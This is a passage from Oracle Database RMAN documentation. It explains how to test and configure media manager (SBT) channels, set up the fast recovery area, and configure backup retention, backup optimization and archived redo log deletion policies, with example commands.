Whenever channel allocation fails, the database writes a trace file to the trace subdirectory in the Automatic Diagnostic Repository (ADR) home directory. The following shows sample output:
SKGFQ OSD: Error in function sbtinit on line 2278
SKGFQ OSD: Look for SBT Trace messages in file /oracle/rdbms/log/sbtio.log
SBT Initialize failed for /oracle/lib/libobk.so
See Also:
Oracle Database Administrator's Guide to learn how to use the Automatic Diagnostic Repository to monitor database operations
Testing Backup and Restore Operations on the Media Manager
After testing a channel allocation on the media manager, create and restore a test backup. For example, you can use the command in Example 5-6 (substituting the channel settings required by your media management vendor) to test whether a backup can be created on the media manager. If your database does not use a server parameter file, then back up the current control file instead.
Example 5-6 Backing Up the Server Parameter File to Tape
RUN
{
ALLOCATE CHANNEL c1 DEVICE TYPE sbt
PARMS 'SBT_LIBRARY=/mydir/lib/libobk.so,
ENV=(OB_DEVICE=drive1,OB_MEDIA_FAMILY=datafile_mf)';
BACKUP SPFILE;
# If your database does not use a server parameter file, use:
# BACKUP CURRENT CONTROLFILE;
}
If the backup succeeds, then attempt to restore the server parameter file as an initialization parameter file. Example 5-7 restores the backup created in Example 5-6 to a temporary directory.
Example 5-7 Restoring the Server Parameter File from Tape
RUN
{
ALLOCATE CHANNEL c1 DEVICE TYPE sbt
PARMS 'SBT_LIBRARY=/mydir/lib/libobk.so,
ENV=(OB_DEVICE=drive1,OB_MEDIA_FAMILY=datafile_mf)';
RESTORE SPFILE TO PFILE '/tmp/test_restore.f';
# If your database does not use a server parameter file, use:
# RESTORE CURRENT CONTROLFILE TO '/tmp/test_restore.f';
}
If the backup and restore operations succeed, then you are ready to use the media manager with RMAN. Possible failures include the following cases:
• The backup hangs.
A hanging backup usually indicates that the media manager is waiting to mount a tape. Check if there are any media manager jobs in tape mount request mode and fix the problem. Ensure that the steps in "Configuring RMAN to Make Backups to a Media Manager" are correctly done.
• The backup fails with ORA-27211: Failed to load Media Management Library.
This error indicates that the media management software is not correctly configured. Ensure that the steps in "Configuring RMAN to Make Backups to a Media Manager" are correctly done. Also, ensure that you have the correct PARMS and FORMAT strings required by your media management software.
Configuring SBT Channels for Use with a Media Manager
This section describes how to configure channels for use with a media manager. For an overview of configured channels and how they are used, refer to the section "Configuring Advanced Channel Options".
About Media Manager Backup Piece Names
A backup piece name is determined by the FORMAT string specified in the BACKUP command, CONFIGURE CHANNEL command, or ALLOCATE CHANNEL command. The media manager considers the backup piece name as the name of the backup file, so every backup piece must have a unique name in the media management catalog.
You can use the substitution variables in a FORMAT parameter to generate unique backup piece names. For example, %d specifies the name of the database, whereas %t specifies the backup timestamp. For most purposes, you can use %U, in which case RMAN automatically generates a unique filename. The backup piece name 12i1nk47_1_1 is an example. If you do not specify the FORMAT parameter, then RMAN automatically generates a unique filename with the %U substitution variable.
Your media manager may impose restrictions on file names and sizes. In this case, you may need more fine-grained control over the naming of backup pieces so that they obey media manager restrictions. For example, some media managers only support a 14-character backup piece name, and some require special FORMAT strings. The unique names generated by the %U substitution variable do not exceed 14 characters.
Some media managers may have limits on the maximum size of files that they can back up or restore. You must ensure that RMAN does not produce backup sets larger than those limits. To limit backup piece sizes, use the parameter MAXPIECESIZE, which you can set in the CONFIGURE CHANNEL and ALLOCATE CHANNEL commands.
See Also:
Configuring Automatic SBT Channels
The easiest technique for backing up to a media manager is to configure automatic SBT channels. As explained in "Configuring the Default Device for Backups: Disk or SBT", you can use a tape device as your default backup destination.
To configure channels for use with a media manager:
1. Configure a generic SBT channel.
In the configuration enter all parameters that you tested in the section "Testing Backup and Restore Operations on the Media Manager". The following example configures vendor-specific channel parameters and sets the default device:
CONFIGURE CHANNEL DEVICE TYPE sbt
PARMS 'ENV=(OB_RESOURCE_WAIT_TIME=1minute,OB_DEVICE=tape1)';
2. Configure the default device type to SBT, as shown in the following command:
CONFIGURE DEFAULT DEVICE TYPE TO sbt;
If you use more than one tape device, then you must specify the channel parallelism as described in "Configuring Channel Parallelism for Disk and SBT Devices". The following configuration enables you to back up to two tape drives in parallel:
CONFIGURE DEVICE TYPE sbt PARALLELISM 2;
Optionally, check your channel configuration by running the following command:
SHOW CHANNEL FOR DEVICE TYPE sbt;
3. Make a test backup to tape.
The following command backs up the server parameter file to tape:
BACKUP SPFILE;
4. List your backups to make sure that the test backup went to the media manager:
LIST BACKUP OF SPFILE;
Configuring the Fast Recovery Area
As explained in "Fast Recovery Area", the fast recovery area feature enables you to set up a disk area where the database can create and manage a variety of files related to backup and recovery. Use of the fast recovery area is strongly recommended. Consider configuring a fast recovery area as one of the first steps in implementing a backup strategy.
This section outlines the functions of the fast recovery area, identifies the files stored there, explains the rules for file management, and introduces the most important configuration options. This section contains the following topics:
Overview of the Fast Recovery Area
The fast recovery area can contain control files, online redo logs, archived redo logs, flashback logs, and RMAN backups. Files in the recovery area are permanent or transient. Permanent files are active files used by the database instance. All files that are not permanent are transient. In general, Oracle Database eventually deletes transient files after they become obsolete under the backup retention policy or have been backed up to tape.
The fast recovery area is an Oracle managed space which can be used to hold RMAN disk backups, control file autobackups and archived redo log files. The files placed in this location are maintained by Oracle and the generated filenames are maintained in Oracle Managed Files (OMF) format.
Table 5-2 describes the files in the recovery area, the classification of each file as permanent or temporary, and how database availability is affected.
Table 5-2 Files in the Fast Recovery Area
Files Type Database Behavior When Fast Recovery Area Is Inaccessible
Multiplexed copies of the current control file
Permanent
The instance fails if the database cannot write to a multiplexed copy of the control file stored in the fast recovery area. Failure occurs even if accessible multiplexed copies are located outside the recovery area.
See Also: "Configuring Control File Locations" to learn how to configure control files in the recovery area
Online redo log files
Permanent
Instance availability is not affected if a mirrored copy of the online redo log exists in an accessible location outside the fast recovery area. Otherwise, the instance fails.
See Also: "Configuring Online Redo Log Locations" to learn how to configure online redo logs in the recovery area
Archived redo log files
Transient
Instance availability is not affected if the log is archived to an accessible location outside the fast recovery area. Otherwise, the database eventually halts because it cannot archive the online redo logs.
See Also: "Configuring Archived Redo Log Locations" to learn how to configure archived redo logs in the recovery area
Foreign archived redo log files
Transient
Instance availability is not affected.
Note: Foreign archived redo logs are received by a logical standby database for a LogMiner session. Unlike a normal archived log, a foreign archived redo log has a different DBID. For this reason, it cannot be backed up or restored on a logical standby database.
Image copies of datafiles and control files
Transient
Instance availability is not affected.
Backup pieces
Transient
Instance availability is not affected.
Flashback logs
Transient
Instance availability is not affected if guaranteed restore points are not defined. In this case, the database automatically disables Flashback Database, writes a message to the alert log, and continues with database processing. If guaranteed restore points are configured, the instance fails because of interdependencies on the flashback logs.
The Oracle Flashback Database feature, which provides a convenient alternative to database point-in-time recovery (DBPITR), generates flashback logs. These logs are transient files and must be stored in the fast recovery area. Unlike other transient files, flashback logs cannot be backed up to other media. If the fast recovery area has insufficient space to store flashback logs and meet other backup retention requirements, then the recovery area may delete flashback logs.
See Also: "Enabling Flashback Database" to learn how to enable flashback logging
If you are on a Windows platform, then you can use the Volume Shadow Copy Service (VSS) in conjunction with the Oracle VSS writer. In this case, the fast recovery area automates management of files that are already backed up in a VSS snapshot and deletes them as needed.
Oracle Managed Files and Automatic Storage Management
The fast recovery area can be used in conjunction with Oracle Managed Files (OMF) and Automatic Storage Management (ASM). The fast recovery area is built on top of OMF, so the fast recovery area can be stored anywhere Oracle Managed Files can. You can also use the recovery area with ASM.
Even if you choose not to set up the fast recovery area in ASM storage, you can still use Oracle Managed Files to manage your backup files in an ASM disk group. Although you lose one of the major benefits of the fast recovery area: the automatic deletion of files no longer needed to meet your recoverability goals as space is needed for more recent backups. Nevertheless, the other automatic features of OMF still function.
When storing backups, using OMF on top of ASM without using a fast recovery area is supported but discouraged. It is awkward to directly manipulate files under ASM.
How Oracle Manages Disk Space in the Fast Recovery Area
Space in the fast recovery area is balanced among backups and archived logs that must be kept according to the retention policy, and other files which may be subject to deletion. Oracle Database does not delete eligible files from the fast recovery area until the space must be reclaimed for some other purpose. Thus, files recently moved to tape are often still available on disk for use in recovery. The recovery area can thus serve as a cache for tape. When the fast recovery area is full, Oracle Database automatically deletes eligible files to reclaim space in the recovery area as needed.
Enabling the Fast Recovery Area
You enable the fast recovery area by setting two initialization parameters. These parameters enable the fast recovery area without having to shut down and restart the database instance.
You set the size of the fast recovery area with the parameter DB_RECOVERY_FILE_DEST_SIZE first and then you set the physical location of the flash recovery files with the parameter DB_RECOVERY_FILE_DEST.
Table 5-3 discusses both the mandatory and optional parameters for enabling the fast recovery area.
In an Oracle Real Application Clusters (Oracle RAC) database, all instances must have the same values for these initialization parameters. The location must be on a cluster file system, ASM, or a shared directory.
Table 5-3 Initialization Parameters for the Fast Recovery Area
Initialization Parameter Required Description
DB_RECOVERY_FILE_DEST_SIZE
Yes
Specifies the disk quota, which is maximum storage in bytes of data to be used by the recovery area for this database. You must set this parameter before DB_RECOVERY_FILE_DEST.
The DB_RECOVERY_FILE_DEST_SIZE setting does not include the following kinds of disk overhead:
• Block 0 or the operating system block header of each Oracle file is not included.
Allow an extra 10% for this data when computing the actual disk usage required for the fast recovery area.
• DB_RECOVERY_FILE_DEST_SIZE does not indicate the real size occupied on disk when the underlying file system is mirrored, compressed, or affected by overhead not known to Oracle Database.
For example, if the recovery area is on a two-way mirrored ASM disk group, each file of x bytes occupies 2x bytes on the ASM disk group. In this case, set DB_RECOVERY_FILE_DEST_SIZE to no more than half the size of the disks for the ASM disk group. Likewise, when using a three-way mirrored ASM disk group, DB_RECOVERY_FILE_DEST_SIZE must be no more than one third the size of the disks in the disk group, and so on.
DB_RECOVERY_FILE_DEST
Yes
Specifies the recovery area location, which can be a file system directory or ASM disk group, but not raw disk. The location must be large enough for the disk quota.
DB_FLASHBACK_RETENTION_TARGET
No
Specifies the upper limit (in minutes) on how far back in time the database may be flashed back. This parameter is required only for Flashback Database.
This parameter indirectly determines how much flashback log data is kept in the recovery area. The size of flashback logs generated by the database can vary considerably depending on the database workload. If more blocks are affected by database updates during a given interval, then more disk space is used by the flashback log data generated for that interval.
See Also:
Oracle Database SQL Language Reference for ALTER SYSTEM syntax, and Oracle Database Administrator's Guide for details on setting and changing database initialization parameters
Considerations When Setting the Size of the Fast Recovery Area
The larger the fast recovery area is, the more useful it becomes. Ideally, the fast recovery area should be large enough to contain the files listed in Table 5-2. The recovery area should be able to contain a copy of all datafiles in the database and the incremental backups used by your chosen backup strategy.
If providing this much space is impractical, then it is best to create an area large enough to keep a backup of the most important tablespaces and all the archived logs not yet on tape. At an absolute minimum, the fast recovery area must be large enough to contain the archived redo logs not yet on tape. If the recovery area has insufficient space to store flashback logs and meet other backup retention requirements, then the recovery area may delete flashback logs to make room.
Formulas for estimating a useful fast recovery area size depend on whether:
• Your database has a small or large number of data blocks that change frequently
• You store backups only on disk, or on disk and tape
• You use a redundancy-based backup retention policy, or a recovery window-based retention policy
• You plan to use Flashback Database or a guaranteed restore point as alternatives to point-in-time recovery in response to logical errors
If you plan to enable flashback logging, then the volume of flashback log generation is approximately the same order of magnitude as redo log generation. For example, if you intend to set DB_FLASHBACK_RETENTION_TARGET to 24 hours, and if the database generates 20 GB of redo in a day, then a rule of thumb is to allow 20 GB to 30 GB disk space for the flashback logs. The same rule applies to guaranteed restore points when flashback logging is enabled. For example, if the database generates 20 GB redo every day, and if the guaranteed restore point is kept for a day, then plan to allocate 20 to 30 GB.
Suppose that you want to determine the size of a flash recovery when the backup retention policy is set to REDUNDANCY 1 and you intend to follow the Oracle Suggested Strategy of using an incrementally updated backup. In this example, you use the following formula to estimate the disk quota, where n is the interval in days between incremental updates and y is the delay in applying the foreign archived redo logs on a logical standby database:
Disk Quota =
Size of a copy of database +
Size of an incremental backup +
Size of (n+1) days of archived redo logs +
Size of (y+1) days of foreign archived redo logs (for logical standby) +
Size of control file +
Size of an online redo log member * number of log groups +
Size of flashback logs (based on DB_FLASHBACK_RETENTION_TARGET value)
Considerations When Setting the Location of the Fast Recovery Area
Place the fast recovery area on a separate disk from the database area, where the database maintains active database files such as datafiles, control files, and online redo logs. Keeping the fast recovery area on the same disk as the database area exposes you to loss of both your live database files and backups if a media failure occurs.
Oracle recommends that DB_RECOVERY_FILE_DEST be set to a different value from DB_CREATE_FILE_DEST or any of the DB_CREATE_ONLINE_LOG_DEST_n initialization parameters. The database writes a warning to the alert log if DB_RECOVERY_FILE_DEST is the same as these parameters.
Multiple databases can have the same value for DB_RECOVERY_FILE_DEST, but one of the following must be true:
• No two databases for which the DB_UNIQUE_NAME initialization parameters are specified have the same value for DB_UNIQUE_NAME.
• For those databases where no DB_UNIQUE_NAME is provided, no two databases have the same value for DB_NAME.
When databases share a single recovery area in this way, the location should be large enough to hold the files for all databases. Add the values for DB_RECOVERY_FILE_DEST_SIZE for the databases, then allow for overhead such as mirroring or compression.
Setting the Fast Recovery Area Location and Initial Size
Table 5-3 lists the initialization parameters that you must set to enable the fast recovery area. This section explains how to specify a location for the recovery area and set its initial size.
To determine the optimum size for the fast recovery area:
1. If you plan to use flashback logging or guaranteed restore points, then query V$ARCHIVED_LOG to determine how much redo the database generates in the time to which you intend to set DB_FLASHBACK_RETENTION_TARGET.
2. Set the recovery area size.
If you plan to use flashback logging or guaranteed restore points, then ensure that the size value obtained from step 1 is incorporated into the setting. Set the DB_RECOVERY_FILE_DEST_SIZE initialization parameter by any of the following means:
• Shut down the database and set the DB_RECOVERY_FILE_DEST_SIZE parameter in the initialization parameter file of the database, as shown in the following example:
DB_RECOVERY_FILE_DEST_SIZE = 10G
• Specify them with the SQL statement ALTER SYSTEM SET when the database is open, as shown in the following examples:
ALTER SYSTEM SET
DB_RECOVERY_FILE_DEST_SIZE = 10G
SCOPE=BOTH SID='*';
• Use the Database Configuration Assistant to set the size
3. Set the recovery area location.
Set the initialization parameters by any of the following means:
• Set DB_RECOVERY_FILE_DEST in the initialization parameter file of the database, as shown in the following example:
DB_RECOVERY_FILE_DEST = '/u01/oradata/rcv_area'
• Specify DB_RECOVERY_FILE_DEST with the SQL statement ALTER SYSTEM SET when the database is open, as shown in the following example:
ALTER SYSTEM SET
DB_RECOVERY_FILE_DEST = '+disk1'
SCOPE=BOTH SID='*';
• Use the Database Configuration Assistant to set the location
If you do not plan to use flashback logging, then open the database (if it is closed) and do not complete the rest of the steps in this procedure.
4. If flashback logging is enabled, then run the database under a normal workload for the time period specified by DB_FLASHBACK_RETENTION_TARGET.
In this way, the database can generate a representative sample of flashback logs.
5. Query the V$FLASHBACK_DATABASE_LOG view as follows:
SELECT ESTIMATED_FLASHBACK_SIZE
FROM V$FLASHBACK_DATABASE_LOG;
The result is an estimate of the disk space needed to meet the current flashback retention target, based on the database workload since Flashback Database was enabled.
6. If necessary, adjust the flashback log space requirement based on the actual size of flashback logs generated during the time period specified by DB_FLASHBACK_RETENTION_TARGET.
Disabling the Fast Recovery Area
If you have enabled Flashback Database or use the fast recovery area for archive logs, then follow the appropriate steps below. Otherwise, skip to step 3:
1. If Flashback Database is enabled, then disable it before you disable the fast recovery area.
ALTER DATABASE FLASHBACK OFF;
2. If you are using fast recovery area for archive logs, then set the initialization parameter LOG_ARCHIVE_DEST_n to use a non-fast recovery area location.
For example, to change the fast recovery area for LOG_ARCHIVE_DEST_1 to a non-fast recovery area location, use the command ALTER SYSTEM SET:
LOG_ARCHIVE_DEST_1='LOCATION=USE_DB_RECOVERY_FILE_DEST'
ALTER SYSTEM SET LOG_ARCHIVE_DEST_1='LOCATION=/ORACLE/DBS/';
3. Disable the fast recovery area initialization parameter.
ALTER SYSTEM SET DB_RECOVERY_FILE_DEST='';
Configuring Locations for Control Files and Redo Logs
As explained in "Overview of the Fast Recovery Area", the only permanent files are multiplexed copies of the current control file and online redo logs. This section explains how to set locations for these files as well as the archived logs.
Configuring Online Redo Log Locations
The initialization parameters that determine where online redo log files are created are DB_CREATE_ONLINE_LOG_DEST_n, DB_RECOVERY_FILE_DEST, and DB_CREATE_FILE_DEST. Details of the effect of combinations of these parameters on online redo log creation can be found in Oracle Database SQL Language Reference in the description of the LOGFILE clause of the CREATE DATABASE statement.
The following SQL statements can create online redo logs in the fast recovery area:
The default size of an online log created in the fast recovery area is 100 MB. The log member filenames are automatically generated by the database.
Configuring Control File Locations
The initialization parameters CONTROL_FILES, DB_CREATE_ONLINE_LOG_DEST_n, DB_RECOVERY_FILE_DEST, and DB_CREATE_FILE_DEST all interact to determine the location where the database control files are created. For a full description of how these parameters interact, see the "Semantics" section of the description of CREATE CONTROLFILE in Oracle Database SQL Language Reference.
If the database creates an Oracle managed control file, and if the database uses a server parameter file, then the database sets the CONTROL_FILES initialization parameter in the server parameter file. If the database uses a client-side initialization parameter file, then you must set the CONTROL_FILES initialization parameter manually in the initialization parameter file.
Configuring Archived Redo Log Locations
It is recommended that you the use fast recovery area as an archiving location because the archived logs are automatically managed by the database. The generated filenames for the archived logs in the fast recovery area are for Oracle Managed files and are not determined by LOG_ARCHIVE_FORMAT. Whatever archiving scheme you choose, it is always advisable to create multiple copies of archived redo logs.
You have the following basic options for archiving redo logs, listed from most to least recommended:
1. Enable archiving to the fast recovery area only and use disk mirroring to create the redundancy needed to protect the archived redo logs.
If DB_RECOVERY_FILE_DEST is specified and no LOG_ARCHIVE_DEST_n is specified, then LOG_ARCHIVE_DEST_10 is implicitly set to the recovery area. You can override this behavior by setting LOG_ARCHIVE_DEST_10 to an empty string.
2. Enable archiving to the fast recovery area and set other LOG_ARCHIVE_DEST_n initialization parameter to locations outside the fast recovery area.
If a fast recovery area is configured, then you can add the fast recovery area as an archiving destination by setting any LOG_ARCHIVE_DEST_n parameter to LOCATION=USE_DB_RECOVERY_FILE_DEST.
3. Set LOG_ARCHIVE_DEST_n initialization parameters to archive only to non-fast recovery area locations.
If you use the fast recovery area, then you cannot use the LOG_ARCHIVE_DEST and LOG_ARCHIVE_DUPLEX_DEST initialization parameters. Using either of these parameters prevents you from starting the instance. Instead, set the LOG_ARCHIVE_DEST_n parameters. After your database is using LOG_ARCHIVE_DEST_n, you can configure a recovery area.
Note also that if you enable archiving but do not set any value for LOG_ARCHIVE_DEST, LOG_ARCHIVE_DEST_n, or DB_RECOVERY_FILE_DEST, then the redo logs are archived to a default location that is platform-specific. For example, on Solaris the default is ?/dbs.
See Also:
Oracle Database Reference for details on the semantics of the LOG_ARCHIVE_DEST_n parameters
Configuring RMAN File Creation in the Fast Recovery Area
This section describes RMAN commands or implicit actions (such as control file autobackups) that can create files in the fast recovery area, and how to control whether a command creates files there or in another destination. The commands are:
• BACKUP
If you do not specify the FORMAT clause for disk backups, then RMAN creates backup pieces and image copies in the fast recovery area, with names in Oracle Managed Files name format. If a fast recovery area is enabled, and if you do specify FORMAT on BACKUP or a channel, then RMAN creates the backup in a platform-specific location rather than in the recovery area.
• Control File Autobackup
RMAN can create control file autobackups in the fast recovery area. Use the RMAN command CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK CLEAR to clear any configured format option for the control file autobackup location on disk. RMAN creates control file autobackups in in the fast recovery area when no other destination is configured.
• RESTORE ARCHIVELOG
Explicitly or implicitly set one of the LOG_ARCHIVE_DEST_n parameters to LOCATION=USE_DB_RECOVERY_FILE_DEST. If you do not specify SET ARCHIVELOG DESTINATION to override this behavior, then RMAN restores archived redo log files to the fast recovery area.
• RECOVER DATABASE or RECOVER TABLESPACE, RECOVER ... BLOCK, and FLASHBACK DATABASE
These commands restore archived redo log files from backup for use during media recovery, as required by the command. RMAN restores any redo log files needed during these operations to the fast recovery area and deletes them after they are applied during media recovery.
To direct the restored archived logs to the fast recovery area, set one of the LOG_ARCHIVE_DEST_n parameters to LOCATION = USE_DB_RECOVERY_FILE_DEST. Make sure you are not using SET ARCHIVELOG DESTINATION to direct restored logs to some other destination.
Configuring the Backup Retention Policy
As explained in "Backup Retention Policies", the backup retention policy specifies which backups must be retained to meet your data recovery requirements. This policy can be based on a recovery window or redundancy. Use the CONFIGURE RETENTION POLICY command to specify the retention policy.
See Also:
Oracle Database Backup and Recovery Reference for CONFIGURE syntax
Configuring a Redundancy-Based Retention Policy
The REDUNDANCY parameter of the CONFIGURE RETENTION POLICY command specifies how many full or level 0 backups of each datafile and control file that RMAN should keep. If the number of full or level 0 backups for a specific datafile or control file exceeds the REDUNDANCY setting, then RMAN considers the extra backups as obsolete. The default retention policy is REDUNDANCY 1.
As you produce more backups, RMAN keeps track of which ones to retain and which are obsolete. RMAN retains all archived logs and incremental backups that are needed to recover the nonobsolete backups.
Assume that you make a full backup of datafile 7 on Monday, Tuesday, Wednesday, and Thursday. You now have four full backups of this datafile. If REDUNDANCY is 2, then the Monday and Tuesday backups are obsolete. If you make another backup on Friday, then the Wednesday backup of datafile 7 becomes obsolete.
Assume a different case in which REDUNDANCY is 1. You run a level 0 database backup at noon Monday, a level 1 cumulative backup at noon on Tuesday and Wednesday, and a level 0 backup at noon on Thursday. Immediately after each daily backup you run a DELETE OBSOLETE. The Wednesday DELETE command does not remove the Tuesday level 1 backup because this backup is not redundant: the Tuesday level 1 backup could be used to recover the Monday level 0 backup to a time between noon on Tuesday and noon on Wednesday. However, the DELETE command on Thursday removes the previous level 0 and level 1 backups.
Run the CONFIGURE RETENTION POLICY command at the RMAN prompt, as in the following example:
CONFIGURE RETENTION POLICY TO REDUNDANCY 3;
Configuring a Recovery Window-Based Retention Policy
The RECOVERY WINDOW parameter of the CONFIGURE command specifies the number of days between the current time and the earliest point of recoverability. RMAN does not consider any full or level 0 incremental backup as obsolete if it falls within the recovery window. Additionally, RMAN retains all archived logs and level 1 incremental backups that are needed to recover to a random point within the window.
Run the CONFIGURE RETENTION POLICY command at the RMAN prompt. This example ensures that you can recover the database to any point within the last week:
CONFIGURE RETENTION POLICY TO RECOVERY WINDOW OF 7 DAYS;
RMAN does not automatically delete backups rendered obsolete by the recovery window. Instead, RMAN shows them as OBSOLETE in the REPORT OBSOLETE output and in the OBSOLETE column of V$BACKUP_FILES. RMAN deletes obsolete files if you run the DELETE OBSOLETE command.
Disabling the Retention Policy
When you disable the retention policy, RMAN does not consider any backup as obsolete. To disable the retention policy, run this command:
CONFIGURE RETENTION POLICY TO NONE;
Configuring the retention policy to NONE is not the same as clearing it. Clearing it returns it to its default setting of REDUNDANCY 1, whereas NONE disables it.
If you disable the retention policy and run REPORT OBSOLETE or DELETE OBSOLETE without passing a retention policy option to the command, then RMAN issues an error because no retention policy exists to determine which backups are obsolete.
Note:
If you are using a fast recovery area, then you should not run your database with the retention policy disabled. If files are never considered obsolete, then a file can only be deleted from the fast recovery area if it has been backed up to some other disk location or to a tertiary storage device such as tape. This action is likely to use all of the space in your recovery area, which interferes with the normal operation of your database. See "How Oracle Manages Disk Space in the Fast Recovery Area".
Configuring Backup Optimization
Run the CONFIGURE command to enable and disable backup optimization. Backup optimization skips the backup of files in certain circumstances if the identical file or an identical version of the file has already been backed up.
Overview of Backup Optimization
If you enable backup optimization, then the BACKUP command skips backing up files when the identical file has already been backed up to the specified device type. Table 5-4 describes criteria that RMAN uses to determine whether a file is identical to a file that it already backed up.
Table 5-4 Criteria to Determine an Identical File
Type of File Criteria to Determine an Identical File
Datafile
The datafile must have the same DBID, checkpoint SCN, creation SCN, and RESETLOGS SCN and time as a datafile already in a backup. The datafile must be offline-normal, read-only, or closed normally.
Archived log
Same DBID, thread, sequence number, and RESETLOGS SCN and time.
Backup set
Same DBID, backup set record ID and stamp.
If RMAN determines that a file is identical and it has already been backed up, then it is a candidate to be skipped. RMAN must do further checking to determine whether to skip the file, however, because both the retention policy and the backup duplexing feature are factors in the algorithm that determines whether RMAN has sufficient backups on the specified device type.
RMAN uses backup optimization when the following conditions are true:
• The CONFIGURE BACKUP OPTIMIZATION ON command has been run to enable backup optimization.
• You run BACKUP DATABASE, BACKUP ARCHIVELOG with ALL or LIKE options, or BACKUP BACKUPSET ALL, BACKUP RECOVERY AREA, BACKUP RECOVERY FILES, or BACKUP DATAFILECOPY.
Note:
When TO DESTINATION is used in conjunction with BACKUP RECOVERY AREA or BACKUP RECOVERY FILES, RMAN only skips backups of files that have identical backups in the TO DESTINATION location you provide.
• Only one type of channel is allocated - do not mix disk and SBT channels in the same backup command.
Note:
In backup undo optimization, RMAN excludes undo (that is not needed for recovery of a backup) for transactions that have already been committed. You can enable and disable backup optimization, but backup undo optimization is built-in behavior.
For example, assume that you have configured backup optimization. These commands back up to tape the database, all archived logs, and all backup sets:
BACKUP DEVICE TYPE sbt DATABASE PLUS ARCHIVELOG;
BACKUP DEVICE TYPE sbt BACKUPSET ALL;
If none of the backed-up files has changed since the last backup, then RMAN does not back up the files again. RMAN also does not signal an error if it skips all files specified in the command because the files have already been backed up.
You can override optimization at any time by specifying the FORCE option on the BACKUP command. For example, you can run:
BACKUP DATABASE FORCE;
BACKUP ARCHIVELOG ALL FORCE;
See Also:
The CONFIGURE entry in Oracle Database Backup and Recovery Reference for a complete description of the backup optimization rules
Effect of Retention Policies on Backup Optimization for SBT Backups
Backup optimization is not always applied when backing up to SBT devices. The exceptions to normal backup optimization behavior for recovery window-based and redundancy-based retention policies are described in the following sections.
Note:
Use caution when enabling backup optimization if you use a media manager with its own internal expiration policy. Run the CROSSCHECK command periodically to synchronize the RMAN repository with the media manager. Otherwise, RMAN may skip backups due to optimization without recognizing that the media manager has discarded backups stored on tape.
Backup Optimization for SBT Backups with Recovery Window Retention Policy
Suppose that backup optimization is enabled, and a recovery window backup retention policy is in effect. In this case, when performing SBT backups RMAN always backs up datafiles whose most recent backup is older than the recovery window. For example, assume the following scenario:
• Today is February 21.
• The recovery window is 7 days.
• The most recent backup of tablespace tools to tape is January 3.
• Tablespace tools is read-only.
On February 21, when you issue a command to back up tablespace tools to tape, RMAN backs it up even though it did not change after the January 3 backup (because it is read-only). RMAN makes the backup because no backup of the tablespace exists within the 7-day recovery window.
This behavior enables the media manager to expire old tapes. Otherwise, the media manager would be forced to keep the January 3 backup of tablespace tools indefinitely. By making a more recent backup of tablespace tools on February 21, RMAN enables the media manager to expire the tape containing the January 3 backup.
Backup Optimization for SBT Backups With Redundancy Retention Policy
Assume that you configure a retention policy for redundancy. In this case, RMAN only skips backups of offline or read-only datafiles to SBT when there are r + 1 backups of the files, where r is set in CONFIGURE RETENTION POLICY TO REDUNDANCY r.
For example, assume that you enable backup optimization and set the following retention policy:
CONFIGURE DEFAULT DEVICE TYPE TO sbt;
CONFIGURE BACKUP OPTIMIZATION ON;
CONFIGURE RETENTION POLICY TO REDUNDANCY 2;
With these settings, RMAN only skips backups when three identical files are already backed up. Also assume that you have never backed up the users tablespace, which is read/write, and that you perform the actions described in Table 5-5 over the course of the week.
Table 5-5 Effect of Redundancy Setting on Backup Optimization
Day Action Result Redundant Backup
Monday
Take users offline normal.
Tuesday
BACKUP DATABASE
The users tablespace is backed up.
Wednesday
BACKUP DATABASE
The users tablespace is backed up.
Thursday
BACKUP DATABASE
The users tablespace is backed up.
Tuesday backup
Friday
BACKUP DATABASE
The users tablespace is not backed up.
Tuesday backup
Saturday
BACKUP DATABASE
The users tablespace is not backed up.
Tuesday backup
Sunday
DELETE OBSOLETE
The Tuesday backup is deleted.
Monday
BACKUP DATABASE
The users tablespace is backed up.
Wednesday backup
The backups on Tuesday, Wednesday, and Thursday back up the offline users tablespace to satisfy the condition that three backups must exist (one more than redundancy setting). The Friday and Saturday backups do not back up the users tablespace because of backup optimization. The Tuesday backup of users is obsolete beginning on Thursday.
On Sunday, you delete all obsolete backups, which removes the Tuesday backup of users. The Tuesday backup is obsolete because of the retention policy setting. The whole database backup on Monday then backs up the users tablespace to satisfy the condition that three backups must exist (one more than redundancy setting). In this way, you can recycle your tapes over time.
Configuring Backup Optimization
By default, backup optimization is configured to OFF. You can use the SHOW BACKUP OPTIMIZATION command to view the current settings of backup optimization.
To configure backup optimization:
1. Start RMAN and connect to a target database and a recovery catalog (if used).
2. Run the SHOW BACKUP OPTIMIZATION command to determine whether optimization is currently enabled.
For example, enter the following command:
SHOW BACKUP OPTIMIZATION;
Sample output for SHOW BACKUP OPTIMIZATION follows:
RMAN configuration parameters for database with db_unique_name PROD1 are:
CONFIGURE BACKUP OPTIMIZATION ON;
3. Enable backup optimization by running the following command:
CONFIGURE BACKUP OPTIMIZATION ON;
See Also:
"Using Backup Optimization to Skip Files" for examples of how to optimize RMAN backups
Configuring an Archived Redo Log Deletion Policy
You can use RMAN to create a persistent configuration that governs when archived redo logs are eligible for deletion from disk.
About Archived Redo Log Deletion Policies
You can use the CONFIGURE ARCHIVELOG DELETION POLICY command to specify when archived redo logs are eligible for deletion. This deletion policy applies to all archiving destinations, including the fast recovery area.
Archived redo logs can be deleted automatically by the database or as a result of user-initiated RMAN commands. Only logs in the fast recovery area can be deleted automatically by the database. For archived redo log files in the fast recovery area, the database retains them as long as possible and automatically deletes eligible logs when additional disk space is required. You can manually delete eligible logs from any location, whether inside or outside the fast recovery area, when you issue BACKUP ... DELETE INPUT or DELETE ARCHIVELOG.
When the Archived Redo Log Deletion Policy Is Disabled
By default, there is no archived redo log deletion policy and this is why the archive redo log policy is set to the NONE clause. In this particular case, the fast recovery area considers archived redo log files in the recovery area as eligible for deletion if they have been backed up at least once to disk or SBT or the logs are obsolete according to the backup retention policy. The backup retention policy considers logs obsolete only if the logs are not needed by a guaranteed restore point and the logs are not needed by Oracle Flashback Database. Archived redo logs are needed by Flashback Database if the logs were created later than SYSDATE-'DB_FLASHBACK_RETENTION_TARGET'.
See Also:
When the Archived Redo Log Deletion Policy Is Enabled
You can use the CONFIGURE ARCHIVELOG DELETION POLICY BACKED UP integer TIMES TO DEVICE TYPE command to enable an archived log deletion policy. This configuration specifies that archived logs are eligible for deletion only when the specified number of archived log backups exist on the specified device type.
